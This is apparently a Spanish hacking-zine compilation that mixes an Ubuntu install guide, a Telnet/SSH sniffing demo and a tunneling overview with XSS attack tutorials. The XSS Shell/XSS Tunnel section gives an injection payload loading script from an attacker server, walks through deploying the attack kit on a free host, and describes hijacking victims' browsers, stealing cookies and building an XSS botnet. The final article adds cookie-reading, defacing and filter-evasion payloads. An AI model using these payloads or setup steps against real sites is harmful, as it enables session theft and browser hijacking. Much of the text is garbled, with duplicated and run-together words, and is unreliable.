AMD Athlon 1000+ 512 Gbyte de memoria RAM Tarjeta de vídeo nVidiaGeForce2 400 MX AGP con 64 MBytes Monitor TFT de 17″ HP pavilion vs17 Placabase Gygabyte GA-7IXEH con chipset VIA KT133 Discos duros: 1 de 40 GBytesSeagate ATA, 1 de 13 GBytes Seagate ATA Regrabadora CD Plextor Tarjeta deSonido: Creative Soundblaster Live! PCI Teclado Logitech Cordless Keyboard
Adaptador Wifi ZyDAS 802.11 b/g USB (proporcionado por Jazztel)
AMD Athlon 64 3000+ 1 Gbyte de memoria RAM Tarjeta de vídeo nVidia GeForce7600 GS (G70) PCI-Express con 512 MBytes Monitor TFT de 17″ HP pavilion
f1723 Placa base Gygabyte GA-K8N Ultra-9 con chipset nVidia nForce4 Discosduros: 1 de 120 GBytes Seagate SATA, 1 de 250 GBytes Seagate SATA
Regrabadora DVD Nec Tarjeta de Sonido: Creative Soundblaster 128 PCIWebcam USB Logitech QuickCam Connect Teclado Logitech Cordless
Keyboard S510 Impresora HP 930C USB
Instalando Ubuntu en Windows.
luego que pongamos el CD en la computadora nos saldrá una ventana comoesta:
Le daremos a Run umenu.exe y luego nos saldrá una ventana como esta:
Para los que no sepan ingles les voy a traducir las 3 opciones que se muestranpara que así puedan tener una idea.
¡Prueba Ubuntu sin instalarlo! simplemente reinicie el su computadora con el CDdentro de la unidad. Puede realizar una instalación completa desde la
demostración para instalar Ubuntu junto con Windows, o bien como su únicosistema operativo instalado en su computadora.
Instala y desinstala Ubuntu como si fuera otra aplicación, sin necesidad de unapartición dedicada. al arrancar el equipo, podrá iniciar Windows o Ubuntu,Eneste modo, la hibernación no está habilitada y el rendimiento del disco sereduce ligeramente.
Ubuntu es un sistema completamente libre basado en Linux y desarrollado porla comunidad, que dispone de un navegador de web, sofware de productividad,mensajería instantánea y mucho más.
Ahora que ya sabemos lo que son las tres opciones le vamos a dar a installinside windows luego que le demos a la opción pasaremos a la siguienteventana:
UnidadUnidadUnidad
Unidad
paraparapara
para
lalala
la
instalaciinstalaciinstalaci
instalaci
óóó
ó
n:n:n:
n:
aquí escogeremos en que unidad de disco duroqueremos que se instale eso sí, si tienes 2 disco duro si no pues normalmente es
el C: no se preocupen esto no dañara nada de su Windows solo que tiene queestar pendiente al espacio libre en su disco duro.
TamaTamaTama
Tama
ñññ
ñ
ooo
o
dedede
de
lalala
la
instalaciinstalaciinstalaci
instalaci
óóó
ó
n:n:n:
n:
Bueno ahí escogeremos la cantidad de espacio quequeremos que tenga nuestro Ubuntu lo mínimo son 4 pero escojan mas asítendrán mas espacios para instalar las aplicaciones que quieran.
EntornoEntornoEntorno
Entorno
dedede
de
escritorio:escritorio:escritorio:
escritorio:
por el momento en el CD sólo podemos elegir el entornografico (GNOME).
Idioma:Idioma:Idioma:
Idioma:
Mmmm escoge el idioma de tu preferencia.
Usuario:Usuario:Usuario:
Usuario:
Por defecto nos vendrá el mismo usuario que tienes en Windows, perotranquilo puedes cambiarlo. El usuario es el nombre con el que iniciaras sesiónen Ubuntu.
ContraseContraseContrase
Contrase
ñññ
ñ
a:a:a:
a:
Pondremos la contraseña que usaremos para iniciar sesión yusaremos como root.
Luego que haigamos terminado de llenar los datos le damos a instalar. Luegonos saldrá la próxima ventana.
Aún el sistema no se está instalando. Lo que está haciendo es preparar unos“archivos temporales” de instalación para la segunda fase, que será la que síhaga la instalación como tal.
ahora cuando termine le damos a Reiniciar ahora.
luego que la computadora reinicie nos saldrá una ventana como esta:
Nos da 2 opciones para escoges sale Windows y Ubuntu en este casoescogemos Ubuntu.
Ahora nos mostrará otro menú de selección, en esta ocasión vamos a escojer“menu.lst“. Elegimos la primera opción que vemos en la imagen y le damos
ENTER.
Ahora Ubuntu estara iniciandose.
después que termine de llenarse la barra naranja nos saldrá una venta con elprogreso de la instalación en este caso no tendremos que hacer Nada soloesperar que termine y listo.
Ahora solo reiniciamos la computadora y nos saldrá de nuevo la ventana paraescoger que sistema operativo usar también ahora escogeremos Ubuntu.
Ahora Ubuntu nos subirá ya normal que que hemos instalado el sistemaoperativo con existo
Nos logeamos y estaremos en el desktop.
Instalando UbuntuStudio desde los repositorios en Ubuntu.
Bueno ya adentro de Ubuntu vamos a:Sistema => administración => gestor depaquetes synaptic
Nossaldrá una venta en ella pondremos el password que pusimos para logearnospara entrar en Ubuntu.
Luego nos pasaremos a la siguiente ventana.
Ahora vamos a buscar en la lista ubuntustudio-desktop le damos clic derecho yescogemos la opción marcar para instalar.
Aparece un cuadro de dialogo donde nos avisa que componentes se van ahinstalar le damos marcar.
Luego le damos a Marcar
luego aquí bien la parte opcional ya que todo depende de nuestras necesidadesinstalando el tipo de paquetes que necesitemos ya sea para producción deaudio, vídeo o de imágenes.
para instalar la paquetería de edición de vídeo marcamos (de la misma formaque marcamos ubuntustudio-desktop), ubuntustudio-video.Para instalar la paquetería de edición de imágenes marcamos, ubuntustudio-graphicsy para instalar la paquetería de edición de audio marcamos, ubuntustudio-audioy ubuntustudio-audio-plugins.
Lo que esta de color verde es lo que hemos escojido para instalar en nuestroUbuntu. Vuelve a salir el cuadro de dialogo avisándonos lo que se va a instalar, yde nuevo de le damos clic en marcar.Luego nos saldrá otra ventana como esta:
y nuevamente le damos a Aplicar.
Luego se estaran descargando los paquetes.
Luego que se descargen se estarán instalando en nuestra computadora.
luego que termine solo resta reiniciar la computadora y volver a entrar y yatendremos nuestro UbuntuStudio instalado.
Bueno eso ha sido todo por hoy si tienes una duda o te gustaría ver manuales asipuedes pasarte por nuestra web http://level-23.com/ con mucho gusto teresiviremos
Autor:Autor:Autor:
Autor:
UnknownShadowUnknownShadowUnknownShadow
UnknownShadow
TelnetTelnetTelnet
Telnet
yyy
y
sshsshssh
ssh
Telnet es el génesis cuanto a conexiones se refriere, en la antigüedad cuandono había exploradores funcionales como FireFox, Opera etc, o no tanfuncionales como IE, los habitantes del Cyber-mundo tenían que conformarsecon una simple consola y un protocolo antiguo pero poderoso para conectarse ala telaraña mundial llamado Telnet…
BreveBreveBreve
Breve
introducciintroducciintroducci
introducci
óóó
ó
nnn
n
aaa
a
Telnet:Telnet:Telnet:
Telnet:
El TelTelTel
Tel
ecommunication NetNetNet
Net
work (Telnet) es un protocolo de red que sirve paraacceder a otra maquina (servidor) para hacer uso remoto de esta. Es decir parahacer manejo de la maquina como si nosotros estuviéramos delante de ella.Esto nos da el potencial de poder usar los recursos de esta maquina(procesador o RAM ) sin levantarnos de la silla en el sótano de nuestra madre…
Las direcciones TELNET tienen el formato conocido por todos de la formaalgo.host.ext o una simple IP XXX.XXX.XXX.XXX acompañada de un número alfinal que indica el puerto, por defecto el 23.
Ejemplo:
locis.loc.gov 23
2009.85.171.100 23
¿¿¿
¿
CCC
C
óóó
ó
momomo
mo
usarusarusar
usar
Telnet?Telnet?Telnet?
Telnet?
Casi todos los sistemas operativos tiene un cliente Telnet nativo /* Digo casitodos por que me acabo de dar cuenta que Windows Vista no contiene el ficherotelnet.exe en System32, increible pero cierto, anótenselo para recordar lasMicropend%#@$ de Win. Vista */
En todo caso clientes Telnet sobran y el mejor ejemplo es el Putty, el cual sepuede encontrar con facilidad en la tiendita de la esquina ;).
Continuando, conectarse mediante Telnet no es complicado ni necesitas sabermuchos comandos, solo daré un ejemplo ya que esto solo pretende ser unbreviario cultural para iniciar.
Abriendo una pagina web desde consola de windows.
C:\> Telnet /*Ejecutamos el cliente*/
Telnet: \>open 198.87.182.161 23
Connected to ejemplo.govEscape character is '^]'.
En este ejemplo solo pedimos abrir la dirección 198.87.182.161 en el puerto 23mediante el comando open, después nos arroja el mensaje de conectado y nosdice que el carácter de escape (salida) es ^.
Hasta ahora todo bonito, podemos conectarnos a servidores con unos cuantoscomandos y disfrutar de la consola todotodotodo
todo
sin salir de casa, pero entonces ¿Cuáles el problema?, y la respuesta que siempre escuchamos: La seguridad.
Telnet abrió las pertas a toda una gama de posibilidades desde usuarios quesolo pretendían conectarse a la biblioteca del congreso hasta algunos malvivientes que descubrieron la cantidad de datos importantes que viajaban en lared sin ningún tipo de protección.
Ese era un gran problema ya que aunque guardaras muy bien tu contraseña de40 caracteres, después que esa información salía de tu ordenador, cualquierpersona que se encontrara “sniffeando” el tráfico de tu red podía leer en textoplano toda tu actividad.
Fue entonces cuando en 1995 Tatu Ylönen propuso la primera versión delprotocolo ahora conocido como SSH.
SSS
S
ecureecureecure
ecure
ShShSh
Sh
ellellell
ell
SSHSSHSSH
SSH
(Secure(Secure(Secure
(Secure
Shell)Shell)Shell)
Shell)
trabaja de forma similar a como se hace con Telnet. Ladiferencia principal es que SSH usa técnicas de cifrado que hacen que lainformación que viaja por el medio de comunicación vaya de manera no legible yninguna tercera persona pueda descubrir el usuario y contraseña de laconexión ni lo que se escribe durante toda la sesión.
Esto represento una gran defensa (aunque no detuvo) a ataques del tipo MITM(Man in the Middle), ARP spoofing, etc., haciendo que el problema de laseguridad ahora dependiera de algoritmos matemáticos de encriptaciónabriendo ahora nuevos problemas para el atacante en turno.
SecureSecureSecure
Secure
ShellShellShell
Shell
desdedesdedesde
desde
elelel
el
puntopuntopunto
punto
dedede
de
vistavistavista
vista
deldeldel
del
atacanteatacanteatacante
atacante
Ahora vamos a tomar el punto de vista del atacante y veremos como se ve unacomunicación cifrada por el protocolo SSH. Espiaremos una comunicaciónprimero sin usar ningún tipo de protección y después con un cliente SSH.
Para esto escogí el Wicked-EvilWicked-EvilWicked-Evil
Wicked-Evil
SnifferSnifferSniffer
Sniffer
Y el OpenOpenOpen
Open
SSHSSHSSH
SSH
http://www.openssh.com/
Primero dejamos nuestro sniffer escuchando todos los paquetes TCP nuestrapropia red. Y nos loggearemos a una cuenta de Messenger usando un servicioen línea como ebbudy o la que gusten y analizaremos el trafico.
Terminando de loggearnos checamos el Logg file que se crea al marcar lacasilla de “Enable Loggining”, y busquemos entre sus entrañas.
Después de buscar un rato en los paquetes TCP, nos encontramos con una lindacookie que crea ebuddy al loggearnos.
Como verán esta mi mail tan claro como el agua (el cual es falso jiji) y un lindohash con la contraseña, que por lo menos ahora viajan en hash, en el primerMessenger que saco Yahoo no hacia ni eso…
Esto no aclara el hecho que es importante que nadie pueda husmear en lacampo data de nuestros paquetes, digo es como si mandaras cartas y cualquiercartero pervertido pudiera ver lo que dice sin ningún inconveniente.
Ahora hagamos lo mismo pero usaremos el putty para conectarnos a unservidor SMTP usando el Secure Shell.
En este caso se ve algo así:
TCP Header: Source Port . . . . . . . 80 Dest Port . . . . . . . . -13376 Acknowledgement Number . 1142514760 Sequence Number . . . . . 570272387 Urgent Pointer . . . . . 0 Flags ACK PSH Windows . . . . . . . . . 15 Checksum . . . . . . . . 39849Data: Þ“$^ î9o‰/*x{ª &##Íþ˜Äû‘ »‚hs ÙNò ùÐ| ZfÆ#]VÝÐËSò³ë'Ü( êtó ôÃ{$µ8%Seä^2Aß1½cæX“ \ò?È jUhv ÚHù¨—ID ¯ ºgÚ'
Aquí esta en texto “plano”.
En Hexadecimal se ve algo así:
Observando uno de los paquetes nos damos cuenta que el campo data no escomprensible ya que esta encriptado, lo cual pone mas difícil las cosas,dependiendo del cliente/servidor la comunicación estará encriptada en RSA de64,128, 256 o hasta 1024bits.
Más información en:
http://www.openssh.com/
http://www.balug.org.ar/ssh.html
AutorAutorAutor
Autor
:::
:
TheTheThe
The
JokeRJokeRJokeR
JokeR
AgradecimientosAgradecimientosAgradecimientos
Agradecimientos
aaa
a
KairozKairozKairoz
Kairoz
porporpor
por
sususu
su
pacienciapacienciapaciencia
paciencia
XSSXSSXSS
XSS
TUNELINGTUNELINGTUNELING
TUNELING
IntroducciIntroducciIntroducci
Introducci
óóó
ó
nnn
n
alalal
al
TunnelingTunnelingTunneling
Tunneling
¿¿¿
¿
QueQueQue
Que
eseses
es
elelel
el
tunneling?tunneling?tunneling?
tunneling?
El tunneling consiste en encapsular un protocolo de red sobre otro (protocolode red encapsulador) creando un túnel dentro de una red de computadoras. Elestablecimiento de dicho túnel se implementa incluyendo una PDU determinadadentro de otra PDU con el objetivo de transmitirla desde un extremo al otro deltúnel sin que sea necesaria una interpretación intermedia de la PDUencapsulada. De esta manera se encaminan los paquetes de datos sobre nodosintermedios que son incapaces de ver en claro el contenido de dichos paquetes.El túnel queda definido por los puntos extremos y el protocolo de comunicaciónempleado, que entre otros, podría ser SSH.
El uso de esta técnica persigue diferentes objetivos, dependiendo del problemaque se esté tratando, como por ejemplo la comunicación de islas en escenariosmulticast, la redirección de tráfico, etc.
Uno de los ejemplos más claros de utilización de esta técnica consiste en laredirección de tráfico en escenarios IP Móvil. En escenarios de IP móvil, cuandoun nodo-móvil no se encuentra en su red base, necesita que su home-agentrealice ciertas funciones en su puesto, entre las que se encuentra la de capturarel tráfico dirigido al nodo-móvil y redirigirlo hacia él. Esa redirección del tráficose realiza usando un mecanismo de tunneling, ya que es necesario que lospaquetes conserven su estructura y contenido originales (dirección IP de origeny destino, puertos, etc.) cuando sean recibidos por el nodo-móvil.
ElElEl
El
TunnelingTunnelingTunneling
Tunneling
sesese
se
basabasabasa
basa
enenen
en
trestrestres
tres
protocolosprotocolosprotocolos
protocolos
1. ElElEl
El
protocoloprotocoloprotocolo
protocolo
deldeldel
del
CarrierCarrierCarrier
Carrier
Es el protocolo usado por la red que esta transportando la información2. EnEnEn
En
protocoloprotocoloprotocolo
protocolo
deldeldel
del
encapsulamientoencapsulamientoencapsulamiento
encapsulamiento
(empaquetamiento)(empaquetamiento)(empaquetamiento)
(empaquetamiento)
Es el protocolo que aplica al envoltorio del paquete enviado, y según eltipo será más o menos seguro, pudiendo ser GRE, IPSec, L2F, PPTP,L2TP, ... Siendo el IPSec el más seguro entre los populares.
3. ElElEl
El
protocoloprotocoloprotocolo
protocolo
pasajeropasajeropasajero
pasajero
Es el protocolo del paquete de información que se envía dentro delenvoltorio, es decir, el paquete original de información. Los "protocolospasajero" habituales son IPX, NetBeui e IP.
El Tunneling tiene implicaciones muy importantes para las VPNs. Por ejemplo,usted puede enviar un paquete que utiliza un protocolo no soportado porInternet (por ejemplo el NetBeui de Microsoft) envuelto por un paquete IP que sipuede ser enviado por Internet. También puede enviar un paquete destinado auna IP de una red privada (no perteneciente a Internet y por tanto no localizable)envuelto por un paquete IP con una dirección pública que si encontrará sudestino en Internet.
En un túnel de una VPN de punto-a-punto, GRE (Generic Routing Encapsulation)será el protocolo de encapsulamiento más habitual, a fin de poder pasar unpaquete de cualquier protocolo nativo envuelto en un paquete IP enviable porInternet. Esto incluye información de que tipo de paquete se está encapsulandoe información de la conexión entre el cliente y el servidor.
Si se precisa seguridad avanzada, en vez de GRE se utilizará IPSec en modoTúnel siendo un protocolo de encapsulamiento seguro tanto en conexiones queunen oficinas como en conexiones de un usuario a una oficina porque ademásde encriptar la información es eficiente autentificando los usuarios.
En accesos de un usuario a una oficina, es muy habitual encontrar PPP. El PPPes parte del TCP/IP, que se usa básicamente para encapsular el protocolo delpaquete original en uno transportable por Internet.
LaLaLa
La
siguientesiguientesiguiente
siguiente
listalistalista
lista
dedede
de
protocolosprotocolosprotocolos
protocolos
sesese
se
hahaha
ha
creadocreadocreado
creado
basbasbas
bas
ááá
á
ndosendosendose
ndose
enenen
en
elelel
el
PPP:PPP:PPP:
PPP:
L2FL2FL2F
L2F
(Layer(Layer(Layer
(Layer
222
2
Forwarding)Forwarding)Forwarding)
Forwarding)
Desarrollado por Cisco, L2F utilizara cualquier esquema deautentificación soportado por el PPP
PPTPPPTPPPTP
PPTP
(Point.to.Point(Point.to.Point(Point.to.Point
(Point.to.Point
TunnelingTunnelingTunneling
Tunneling
Protocol)Protocol)Protocol)
Protocol)
El PPTP fue creado por el foro PPTP, un consorcio de empresas líderes encomunicaciones que soporta encriptaciones de 40 y de 128 bits ycualquiera de los sistemas de autentificación del PPP
L2TPL2TPL2TP
L2TP
(Layer(Layer(Layer
(Layer
222
2
TunnelingTunnelingTunneling
Tunneling
Protocol)Protocol)Protocol)
Protocol)
L2TP es el producto de la cooperación entre varios miembros del foroPPTP, y combina las prestaciones del PPTP y el L2TP así como el IPSec.
El L2TP puede ser usado como un protocolo de Túnel tanto para VPNs de uniónde delegaciones (redes de delegaciones) como para el acceso de usuariosremotos, de hecho, el L2TP puede usarse entre :
El cliente y el router Entre el NAS y el router Entre un router y otro
CROSS-SITECROSS-SITECROSS-SITE
CROSS-SITE
SCRIPTINGSCRIPTINGSCRIPTING
SCRIPTING
(XSS)(XSS)(XSS)
(XSS)
XSS es un ataque basado en la explotación de vulnerabilidades del sistema devalidación de HTML incrustado
Para más información
http://rapidshare.com/files/179568239/XSS_by_Max_p0wer.doc
XSSXSSXSS
XSS
TUNNELINGTUNNELINGTUNNELING
TUNNELING
Para comprender XSS TUNNEL y cómo funciona, debe en primer lugarentender lo que es y cómo funciona.
¿¿¿
¿
QuQuQu
Qu
ééé
é
eseses
es
ununun
un
canalcanalcanal
canal
XSS?XSS?XSS?
XSS?
XSS es un canal interactivo de un canal de comunicación entre dos sistemasque es abierto por un ataque XSS. A nivel técnico, es un tipo de AJAXsolicitud que pueden obtener los comandos, enviar respuestas atrás y es capazde hablarentre dominios.
¿¿¿
¿
QuQuQu
Qu
ééé
é
eseses
es
lalala
la
xssxssxss
xss
Shell?Shell?Shell?
Shell?
XSS Shell es una herramienta que puede ser usado para configurar un canalXSS entre una víctimay un atacante para que un atacante pueda controlar el navegador de la víctimamediante el envío decomandos. Esta comunicación es bidireccional.
Para obtener el XSS Shell a trabajar a un atacante tiene que inyectar el XSSShell de JavaScriptde referencia por medio de un ataque XSS. El atacante es capaz de controlar lavíctimanavegador. Después de este punto, el atacante puede ver las peticiones, lasrespuestas y es capaz deencargar el navegador de la víctima para llevar adelante las peticiones etc.
Un ataque de inyección de la muestra se muestra a continuación;http://foro.level-23.org/q = "> <script src = "http://xssshellserver/xssshell.asp"></ script>
¿¿¿
¿
CCC
C
óóó
ó
momomo
mo
funcionafuncionafunciona
funciona
lalala
la
xssxssxss
xss
Shell?Shell?Shell?
Shell?
XSS Shell es una aplicación que consta de tres partes principales.
En primer lugar, el lado del servidor es parte de la Shell coordina el XSS XSSShell entre unagresor y la víctima. Es una aplicación del lado del servidor y requiere un ASP yIISservidor Web. Utiliza una base de datos de MS Access como de almacenamiento.
La segunda parte de la herramienta es el lado del cliente y por escrito enJavaScript. Esto carga en elEl navegador de la víctima y se encarga de la recepción y el tratamiento de loscomandosjunto con proporcionar el canal entre la víctima y el agresor. Este código
La parte final de la XSS Shell es la interfaz de administración. Un atacante puedeenviarnuevos comandos y recibir las respuestas de una víctima (s) de formainstantánea desde el navegadoresta interfaz. Una vez más, es ASP y requiere IIS.Todos los pasos siguientes no esperar el uno para el otro y estánconstantemente buscando respuestas ysolicitudes dentro de los retrasos de tiempo especificado.
1. Un atacante infecta una página Web con una persistente o reflejado (temporal)de XSSpide que ataque XSS Shell remoto JavaScript.2. La víctima sigue un enlace o visiten la página y ejecuta el código JavaScriptenese dominio.3. El navegador de la víctima comienza a realizar peticiones al periódico XSSShell
Servidor y busca nuevos comandos.4. Cuando la víctima recibe un nuevo navegador como comando (Obtenercookies,Ejecutar JavaScript personalizado, Obtener clave de registro de datos etc.), esprocesada ydevuelve los resultados a la XSS Shell.5. El atacante puede llevar a nuevos comandos víctima (s) de navegador y verlosresultados XSS Shell de la interfaz de administración.
¿¿¿
¿
PorPorPor
Por
quququ
qu
ééé
é
eseses
es
mejormejormejor
mejor
quequeque
que
elelel
el
clclcl
cl
ááá
á
sicosicosico
sico
AtaqueAtaqueAtaque
Ataque
XSS?XSS?XSS?
XSS?
• Un atacante tendría más de un disparo. Después de controlar una víctima (s)navegador el atacante es capaz de decidir su siguiente movimiento sobre labase de las respuestas yel entorno actual.• Le permite pasar por alto la siguiente;o restricciones de propiedad intelectual,o básica / NTLM o autenticación basado similares autenticaciones.• Dado que es la intención de enviar de alerta (“0wned!") ¡A miles de víctimas yconstruir una botnet temporal XSS potencia!
¿¿¿
¿
QuQuQu
Qu
ééé
é
eseses
es
XSSXSSXSS
XSS
ttt
t
úúú
ú
neles?neles?neles?
neles?
XSS de túneles es el túnel de tráfico HTTP a través de un canal a usar XSSprácticamente cualquier aplicación que admita proxies HTTP.¿Qué es XSS túnel?XSS túnel es el Proxy HTTP estándar que se sienta en un sistema del atacante.Cualquier herramientaque está configurado para utilizar el túnel que su tráfico a través del canalactivo en XSSel XSS Shell servidor. XSS convierte el túnel de la solicitud y respondetransparente para validar las respuestas de HTTP y XSS Shell solicitudes.
XSS túnel está escrito en. NET y requiere. NET Framework para trabajar. Setrata de una licencia GPLSolicitud de licencia de código abierto.
Beneficios de XSS túneles• Se permite el uso de prácticamente todas las herramientas que soportanproxies HTTP!
• Es posible utilizar herramientas automatizadas como Nikto, Inyectores SQL,HTTP brutaforcer contra la propiedad intelectual de las zonas restringidas de la Web,• Permite la configuración de su navegador locales para utilizar el túnel y XSSnavegar por la página Web con una víctima de los poderes de su propionavegador, yno implica el uso de cualquier tipo de cookie complicado / IP / agente de usuariobasado en los controles,• Es muy bueno para demostrar el resultado de un ataque XSS.
¿¿¿
¿
CCC
C
óóó
ó
momomo
mo
TrabajaTrabajaTrabaja
Trabaja
elelel
el
XSSXSSXSS
XSS
TTT
T
úúú
ú
nel?nel?nel?
nel?
1. XSS El túnel conecta a un determinado XSS Shell y obtiene el actualIdentificador activo (a la víctima a ser controlado)2. El local de cliente HTTP (navegador, etc. Nikto) envía peticiones HTTP al XSSTúnelo El Túnel XSS convierte peticiones HTTP en el que pide laXSS Shell pueda comprender y procesar. A continuación, envía las solicitudes alXSS Shell Server.XSS Shell o El servidor guarda esta petición a su base de datos (Todas estassolicitudes de trabajo sólo para una determinada víctima por el túnel de XSS.Este IDpuede verse en el salpicadero del túnel XSS).3. El XSS Shell Cliente (que reside en JavaScript en el navegador de la víctima)realiza periódicamente las solicitudes de XSS Shell Server y para los nuevoscontrolescomandos para el proceso.
Este proceso requiere entre dominios leer. XSS Shell utiliza el mando a distanciaJavaScript para eludir la carga del mismo origen, la política de restricciones.O Si hay nuevos comandos, que las cargas y los procesos y envía ellas respuestas (puede ser simplemente un código de confirmación o el códigofuente de unpágina o un archivo binario) para XSS Shell servidor.
Ejecutar comandos y respuestas en una moda multihilo.4. XSS en el túnel de la caché local, el control de la XSS Shell Server para una
respuesta parapreviamente asignados solicitudes. Si hay una respuesta que convierte a larespuestaválida la respuesta HTTP y la envía a la aplicación cliente.
Por defecto, el túnel de XSS cachés JavaScript, CSS y archivos de imagen parauna mejorrendimiento. Esto es realmente necesario si se utiliza el XSS túnel con unnavegador. Sipidió a los recursos ya está en la caché XSS túnel y se puedeobtenidos de la memoria caché local y enviado a la aplicación cliente.
Almacenamiento en caché se puede desactivar la caché o se pueden gestionardesde la interfaz de usuariode XSS Túnel.Un proceso de ataque1. XSS Shell configurar el servidor,2. XSS configurar el túnel para utilizar el servidor de XSS Shell,3. Preparar el ataque XSS (someterse a un sitio Web vulnerables o enviar unenlaceetc.),4. XSS lanzar el túnel y esperar a que una víctima,5. Configurar la herramienta o el navegador para utilizar el túnel de XSS,6. Cuando vea víctima XSS en el túnel, de comenzar a utilizar su navegador /herramientadirigidos para el dominio.
¿¿¿
¿
ComoComoComo
Como
ejecutarejecutarejecutar
ejecutar
lololo
lo
aprendido?aprendido?aprendido?
aprendido?
Necesitamos:
1 nuestra xss Shell y túnnel la podemos descargar directamente dehttp://rapidshare.de/files/43005148/xssshell-xsstunnell.rar.html
Un hosting que soporte asp como por ejemplo http://www.7host.com
Una vez extraídos el rar tenemos las carpetas con la Shell y el tunnel
Procederemos a configurar nuestra Shell
En Server config colocaremos el link de nuestro Host
En el ejemplo seria http://free.7host05.com/level23
Una vez cambiado procedemos a guardar.
Ahora vamos a la carpeta admin. Y procederemos a modificar el database fileeditamos el archivo de db.asp
Donde dice database configuration hay un enlace C:\XSS Shell\XSSShell-060\db\shell.mdb este enlace deberá ser cambiado por la dirección de nuestrohosting pero como saber cual enlace es pues abriremos un block de notas yescribiremos lo siguiente
<%
Response.Write Server.MapPath(".")
%>
La guardamos como test.asp y lo subimos al hosting
Luego abrimos la dirección y encontraremos un a dirección cópienla
Y remplazaremos la dirección C:\XSSC:\XSSC:\XSS
C:\XSS
Shell\XSSShell-060Shell\XSSShell-060Shell\XSSShell-060
Shell\XSSShell-060
\db\shell.mdb
por la dada en nuestro hosting quedaría así
E:\user1\level23\db\shell.mdb
Una vez tenemos todo configurado subimos todos los archivos y carpetas de
nuestra shell
Ya subido los archivos procederemos a entre a nuestra shell
http://free.7host05.com/level23/admin/Default.aspla contraseña por defecto es w00t pero puede ser cambiada en el archivodb.asp
ya tendremos nuestra shell montada
Ahora primero provaremos nuestra shell ingrasamos a la carpeta sample_victimpara provar si funciona nuestra shell. Nuestro ejemplo serahttp://free.7host05.com/level23/sample_victim/
Les debera aparecer esta pagina
Antes expliare en que consiste vemos el codigo de fuente encontraremos esto
ese es el codigo maliciosoque inyectamos con xss ahora vemos que hay que configurar el ejemplo.
Vamos a la carpeta sample_victim en nuestro pc y modificamos el archivodefault.asp, buscamos nuestro codigo malisioso y lo cambiamos por nuestrashell en nuestro caso es http://free.7host05.com/level23/xssshell.asp
Guardamos los cambios y remplazamos los archivos del host
Volvemos abrir el link de sample victim
Y veremos que en nuestra shell se esta haciendo nuestro tunnel
Ya vemos que nuestro tunel sirve ahora vamos a configurar nuestro xss tunel
Abrimos nuestro xsstunel.exe
En options colocaremos la dirección de nuestra shell y el password y testeamossi nos conecta con el server
Ahora iniciaremos el xss tunel y nos conectara con la shell
Ahora debemos configurar nuestro Proxy para nuestro tunel entramos aiexplorer herramientas- opciones de internet->conexiones en el buton
configuración lan
Seleccionaremos en servidor proxy y dejaremos como esta en la imagen Y yatenemos nuestra shell y el xsstunel.
AutorAutorAutor
Autor
:::
:
MaxMaxMax
Max
p0werp0werp0wer
p0wer
”””
”
frozenfewfrozenfewfrozenfew
frozenfew
”””
”
IntroducciIntroducciIntroducci
Introducci
óóó
ó
nnn
n
aaa
a
XSSXSSXSS
XSS
XSSXSSXSS
XSS
es un ataque basado en la explotacion de vulnerabilidades del sistema devalidacion de HTML incrustado. Su nombre, del ingles “Cross Site Scripting”, yrenombrado XSS para que no sea confundido con las hojas de estilo en cascada(CSS), originalmente abarcaba cualquierataque que permitiera ejecutar codigo de “scripting”, como VBScript ojavascript, en el contexto de otro dominio. Recientemente se acostumbra allamar a los ataques de XSS “HTML Injection”, sin embargo el termino correctoes XSS. Estos errores se pueden encontrar en cualquier aplicacion HTML, no selimita a sitios web, ya que puede haber aplicaciones locales vulnerables a XSS,o incluso el navegador en si-. El problema esta en que normalmente no sevalidan correctamente los datos de entrada que son usados en cierta aplicacion.Esta vulnerabilidad puede estar presente de forma directa (foros, mensajes deerror, comentarios) o indirecta (redirecciones, framesets). Cada una se trata deforma diferente.
* Directa: Este tipo de XSS es el que normalmente es censurado; asi- que esmuy poco comun que puedas usar tags como <script> o <iframe>
* Indirecta: Esta es un tipo de vulnerabilidad, muy comun y muy pocoexplotada. Consiste en modificar valores que la aplicacion web utiliza parapasar variables entre dos paginas, sin usar sesiones.
Indirecta
Sucede cuando hay un mensaje o una ruta en la URL del navegador o en unacookie. Para saber el contenido de una cookie, sin usar ningun tipo de iecv oaddin para tu navegador, puedes usar el siguiente script de jasildbg. Solocoloca TODO lo que esta en color negro en la barra de direcciones, y presionaEnter.
javascript:for(var g in document.cookie.split(';'))void(prompt("Valor de cookie "+document.cookie.split(';')[g].split(’=')[0],document.cookie.split(’;')[g].split(’=')[1]));alert(”Cookies:\n”+document.cookie.replace(/;/,”\r\n”));
Una vez dentro se puede modificar la cookie a tu antojo. Si pones cancelar lacookie se borrara.
¿Que podemos ver con este ejemplo? Que podemos meter comandos javascriptsolo modificando una URL.Usando FrameSets
Regresemos al ejemplo del frameset, que segun la pagina que coloques te creaun frame a esa pagina. ¿Que pasara si pones en esa URL?
javascript:while(1)alert("level-23.org!");
Y el enlace lo pone un intruso hacia un foro. Un navegador incauto, va a verlo ydira, bueno, es del mismo dominio, no puede ser nada malo.. y de resultadotendra un loop infinito.
Hasta ahi- llegan los newbies. Pero vamos a ponernos en la piel de un experto.Se trata de colocar un script que tome tu cookie, y mande un mp aladministrador, o incluso, que borre todos los mensajes de un foro.
El robo de cookies es lo mas basico, y tiene como objetivo robar la cookie. ¿Yeso de que sirve? Tengo el PHPSESSID, y si el usuario cierra sesion no sirve denada.
Cierto, pero con el uso de la libreria cURL un usuario malintencionado, podria alrecibir tu cookie, entrar a la pagina, y dejarla en cache, para que el atacantecuando quiera, pueda entrar como tu, sin siquiera necesitar tu contraseña.
Otro uso comun para estas vulnerabilidades es lograr hacer phishing; o colocarun exploit.
Quiere ello decir que tu ves la barra de direcciones, y ves que estas en unapagina, pero realmente estas en otra. Introduces tu contraseña y la fastidiaste.
Lo peor son los sitios de descarga, que colocan en la misma URL el sitio deobjetivo. Esas paginas web son vulnerables a ataques XSS indirectos. O sea queun intruso puede colocar una imagen con enlace al sitio malicioso, y se ejecuta,sin que el usuario lo sepa.Mensaje personalizado
La tecnica solo funciona con imagenes:
error.php?error=Usuario%20Invalido
Esa pagina es vulnerable a XSS indirecto.
Un <script> que cree otra sesion bajo otro usuario y tu sesion actual la mande alatacante (lo explicado de cURL mas arriba), puede causar estragos.
Este codigo (muy peligroso) borra todo el contenido de la pagina en cuestion, yescribe otra cosa:
<script> document.documentElement.innerHTML="NADA";</script>
Directa
Funciona localizando puntos debiles en la programacion de los filtros. Asi que si,por ejemplo, logran quitar los <iframe>, <script>, el atacante siempre puedeponer un <div> malicioso, o incluso un <u> o <s>. Tags que casi siempre estanpermitidos.Ejemplos de Scripts donde no son comunes de encontrar
<BR SIZE="&{alert('level-23')}">
